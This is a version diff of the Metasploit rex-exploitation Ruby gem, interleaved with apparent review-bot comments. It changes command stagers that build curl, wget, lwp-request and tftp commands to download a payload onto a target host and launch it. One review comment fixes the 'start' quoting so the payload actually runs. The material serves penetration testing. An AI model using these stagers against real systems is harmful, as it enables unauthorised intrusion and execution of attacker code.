rex-exploitation 0.1.28 → 0.1.31

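--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: a55ad0e209e6bfeaccd5e0b21a6fab185a3607f0563281402aa7b3f471770f26
-  data.tar.gz: cab2892ed7e9a51590fd7e0214d0b5eb0d46c6b8ed090deb2f877e85e7d6b841
+  metadata.gz: 4cfc7e897b1f86f34cca1faca892489b396c010b3c7135c0954c0d6c720a8bea
+  data.tar.gz: '0289f22adbe9e4d83b786b8518653977e57b35e6456dedd1a546ca5d8e5289bb'
 SHA512:
-  metadata.gz: 04cd73b0220b13a6bfd2b67272a79ee8c86de698bacf7e36dfd404197d5bf27b3070fe9581de4e34eecdefcf4791c51681ef97d706d7a88ae52efd4f1637b7fd
-  data.tar.gz: 9f2b81f309f8214333ab91dd6f475a6be9cf050c689df8daa9b044155e83406777d4a51c155ea0a205b25bce7f845041311817e167eb9d57dba12a7f34b58bbd
+  metadata.gz: db9a31253749214b20d5a8a7bd58d16f72e540c3eb6a6291933220e7d5aad5286cc20bd4ffb6a15cf096ff6dbca49e74c492334d22a7fbaa798ba48e6eead925
+  data.tar.gz: be2a2215875f6ab4b5cf0f1752ac1a5fb11e2d20851e231bdb3bbc2775df84289912a3f95ae36480a2e7ec21db8c5bbaae311921c0b7a6612fef60dc7cd0000e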
checksums.yaml.gz.sig CHANGED
Binary file
@@ -20,6 +20,7 @@ jobs:
20
20
  - 2.6
21
21
  - 2.7
22
22
  - 3.0
23
+ - 3.1
23
24
  test_cmd:
24
25
  - bundle exec rspec
25
26
 
@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+ uri = opts[:payload_uri]
27
28
 
28
29
  if opts[:ssl]
29
- cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
30
+ cmds << "curl -kso #{@payload_path} #{uri}"
30
31
  else
31
- cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
32
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
+ cmds << "curl -so #{@payload_path} #{uri}"
32
34
  end
33
35
 
34
36
  cmds
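Review bot: The new no_proto line strips the scheme with `uri.gsub(%r{^http://}, '')`, but `^` in Ruby anchors to the start of every line rather than the start of the string, and gsub is a global substitution for what is a single prefix removal; `uri = uri.delete_prefix('http://') if opts[:no_proto]` states the intent exactly and cannot touch anything but the leading characters (delete_prefix needs Ruby 2.5+, and the visible CI matrix starts at 2.6). The ssl branch ignores no_proto silently, so a one-line comment such as `# no_proto only applies to plain http:// URIs; curl assumes http when the scheme is omitted` would spare the next reader the question. The same gsub is repeated in the wget and lwp-request stagers in this release, which suggests the strip belongs in a shared helper on CmdStagerBase, outside this diff. generate_cmds_payload's closing `end` lies past the hunk.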
@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
23
23
  end
24
24
 
25
25
  def generate_cmds_payload(opts)
26
- ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
26
+ uri = opts[:payload_uri]
27
+ unless opts[:ssl]
28
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
29
+ end
30
+ ["lwp-request -m GET #{uri} > #{@payload_path}"]
27
31
  end
28
32
 
29
33
  def generate_cmds_decoder(opts)
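Review bot: The `unless opts[:ssl] … end` block added in generate_cmds_payload wraps a single modifier statement; `uri = uri.delete_prefix('http://') if opts[:no_proto] && !opts[:ssl]` is flatter and also drops the `^`-anchored gsub, which in Ruby matches at line starts rather than the start of the string. Whether lwp-request accepts a scheme-less URL and assumes http:// is something I would confirm against the LWP version on typical targets before relying on no_proto here, because a rejected URL fails silently inside the stager with no payload written. The class continues past the hunk, so the behaviour of generate_cmds_decoder below is not visible here.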
@@ -13,7 +13,7 @@ module Exploitation
13
13
  # be written to disk and executed.
14
14
  #
15
15
  # This particular version uses tftp.exe to download a binary from the specified
16
- # server. The original file is preserve, not encoded at all, and so this version
16
+ # server. The original file is preserved, not encoded at all, and so this version
17
17
  # is significantly simpler than other methods.
18
18
  #
19
19
  # Requires: tftp.exe, outbound udp connectivity to a tftp server
@@ -24,14 +24,24 @@ module Exploitation
24
24
 
25
25
  class CmdStagerTFTP < CmdStagerBase
26
26
 
27
- def initialize(exe)
28
- super
29
- @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
27
+ def generate(opts = {})
28
+ if opts[:tftphost].nil?
29
+ raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
30
+ end
31
+
32
+ opts[:linemax] ||= @linemax
33
+ opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
34
+ opts[:temp] ||= '%TEMP%'
35
+
36
+ @payload_exe = opts[:file]
37
+ @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
38
+
39
+ generate_cmds(opts)
30
40
  end
31
41
 
32
42
  def setup(mod)
33
43
  self.tftp = Rex::Proto::TFTP::Server.new
34
- self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
44
+ self.tftp.register_file(@payload_exe, exe)
35
45
  self.tftp.start
36
46
  mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
37
47
  end
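Review bot: setup now registers the served file under `@payload_exe`, which is only assigned inside generate, so a module that calls setup before generate registers the payload under nil and the later `tftp ... GET` never matches; before this change initialize picked the name, so the two calls were order-independent. Either keep a default name in initialize and let generate override it, or guard with `raise ArgumentError, 'generate must run before setup' if @payload_exe.nil?` at the top of setup. The missing-option check would also be better as `raise ArgumentError, "#{self.class.name}##{__callee__} missing opts[:tftphost]"` rather than a bare RuntimeError, so callers can rescue it precisely. Note too that the `||=` defaults write into the caller's hash; if that is deliberate so the module can read back opts[:file], a comment saying so would help.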
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
40
50
  self.tftp.stop
41
51
  end
42
52
 
43
- #
44
- # We override compress commands just to stick in a few extra commands
45
- # last second..
46
- #
47
- def compress_commands(cmds, opts)
48
- # Initiate the download
49
- cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
50
-
51
- # Make it all happen
52
- cmds << "start #{@tempdir + @payload_exe}"
53
-
54
- # Clean up after unless requested not to..
55
- if (not opts[:nodelete])
56
- # XXX: We won't be able to delete the payload while it is running..
53
+ def generate_cmds_payload(opts)
54
+ cmds = []
55
+ # We can skip the destination argument if we're writing to the working directory,
56
+ # as tftp defaults to writing the file to the current directory with the same filename.
57
+ if opts[:file] == @payload_path
58
+ cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
59
+ else
60
+ cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
57
61
  end
62
+ cmds
63
+ end
64
+
65
+ def generate_cmds_decoder(opts)
66
+ cmds = []
67
+ cmds << "start \"#{@payload_path}\""
68
+ # NOTE: We can't delete the payload while it is running.
69
+ cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
70
+ cmds
71
+ end
58
72
 
59
- super
73
+ def cmd_concat_operator
74
+ ' & '
60
75
  end
61
76
 
62
- # NOTE: We don't use a concatenation operator here since we only have a couple commands.
63
- # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
64
- # the start command being issued separately so that it can ignore it :)
65
77
  attr_reader :exe
66
78
  attr_reader :payload_exe
67
79
  attr_accessor :tftp
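Review bot: The `start "#{@payload_path}"` line in generate_cmds_decoder will not launch the payload: cmd.exe's START treats the first quoted argument as the window title, so `start "%TEMP%\abcdefgh.exe"` opens an empty console titled with that path and runs nothing, after which the `del` removes the file. The standard form is `cmds << "start \"\" \"#{@payload_path}\""`, with an empty title first. In generate_cmds_payload the source name is quoted as the destination in the else branch but unquoted on both `GET #{opts[:file]}` lines; since opts[:file] is caller-supplied, `GET \"#{opts[:file]}\"` on both keeps a name containing a space from splitting the command. The class continues past the hunk.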
@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+
28
+ uri = opts[:payload_uri]
27
29
  ncc = '--no-check-certificate'
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
32
+ cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
31
33
  else
32
- cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
34
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
+ cmds << "wget -qO #{@payload_path} #{uri}"
33
36
  end
34
37
 
35
38
  cmds
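Review bot: The no_proto strip on the new line uses `gsub(%r{^http://}, '')`, where `^` anchors to any line start and gsub replaces globally; `uri = uri.delete_prefix('http://') if opts[:no_proto]` removes exactly the leading scheme and nothing else. wget does assume http when the scheme is omitted, so the option is sound here, but that assumption is worth a short comment on the line since it is what makes no_proto safe for this stager and not necessarily for others. generate_cmds_payload's closing `end` is outside the hunk.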
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.28"
3
+ VERSION = "0.1.31"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
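--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.28
+  version: 0.1.31
 platform: ruby
 authors:
 - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2021-09-16 00:00:00.000000000 Z
+date: 2022-07-01 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake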
metadata.gz.sig CHANGED
Binary file